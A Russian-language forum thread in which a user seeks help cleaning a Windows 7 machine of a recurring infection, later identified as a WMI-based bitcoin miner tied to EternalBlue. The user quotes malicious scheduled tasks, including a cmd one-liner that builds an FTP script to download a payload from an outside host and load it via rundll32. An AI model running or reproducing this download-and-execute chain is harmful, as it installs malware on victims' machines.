Добрый день!
Прошу помощи в лечении компьютера. Суть проблемы: периодически происходят попытки загрузки вирусных файлов с различных адресов. Обычно каждые 3 часа. Впервые проблема была замечена еще в мае, но тогда все успешно пофиксилось при помощи Trojan remover. Спустя 2 месяца угроза вновь появилась.
Примеры мест загрузки:
C:\Windows\debug\lsmose.exe
C:\Windows\debug\item.dat
Попытки заражения:
C:\Windows\system32\wbem\scrcons.exe (Заражение: Win32:Rootkit-gen [Rtk])
C:\Windows\system32\lsass.exe (Заражение: URL:Mal)
Были и другие места, но к сожалению старых отчетов не осталось.

В запланированных задачах регулярно появляются такие записи:
Mysa1 – rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
Mysa2 – cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
Ок – rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa

Чистка с помощью Malwarebytes помогает только на день (обнаруживает Trojan.Agent.Generic), потом записи появляются снова. Также были использованы: Avast, Trojan remover, Cureit, AdwCleaner. Все безуспешно.
Система Windows 7 (64 bit). Антивирус Avast Free.

Также прикрепляю первый отчет Malwarebytes от 18.07.17

Народ, у вас хелперы в отпуске что ли?
Создал тему, т.к. нечто подобное уже решали здесь.

Вот, еще скрины приложу, на всякий.

alndr, здравствуйте и добро пожаловать на форум!

К сожалению, не было возможности ответить раньше…

[*]Сохраните прикрепленный файл fixlist.txt в папку, откуда был запущен FRST (M:\install)
[*]Теперь, пожалуйста, запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
[*]Обратите внимание, что компьютер будет перезагружен.

ВНИМАНИЕ! Данный скрипт написан только для этого пользователя, использование его на другом компьютере может привести к неработоспособности ОС!

После выполнения скрипта скачайте, пожалуйста, WMI Explorer 2.0 по ссылке https://www.bleepingcomputer.com/download/wmi-explorer/
В нем, в ROOT\subscription найдите класс ActiveScriptEventConsumer, далее скопируйте скрипт, сохраните в блокноте и прикрепите в следующем сообщении. После этого данный класс можно удалить.

Добрый день. Вообще я уже проблему решил (хочется верить). CureIt, по всей видимости, занесли вирус в базу и последняя версия обнаружила скрипт, о котором вы говорите.

Угроза: [Trojan.Btc.Mine]
Заражение: \WMI\root\ActiveScriptEventConsumer {226c72e7-62e8-11d1-ad89-00c04fd8fdff}

После очистки уже 5 дней, как все в норме. Все равно выполнить ваши рекомендации?

Chessplayer, да, выполните скрипт в FRST, загружать WMI Explorer 2.0 уже не надо.

Andrey,pro, после выполнения скрипта и перезагрузки, аваст каждую минуту стал присылать сообщения об угрозе (на скриншоте). Начинается через час после каждой перезагрузки. Сканирование ничего не находит.

По уведомлениям видно, что это известный эксплойт EternalBlue, но Microsoft еще весной пофиксила эту уязвимость в обновлениях, а у меня установлены последние, за август. Сейчас закачалась еще пара небольших обновлений и пока все тихо.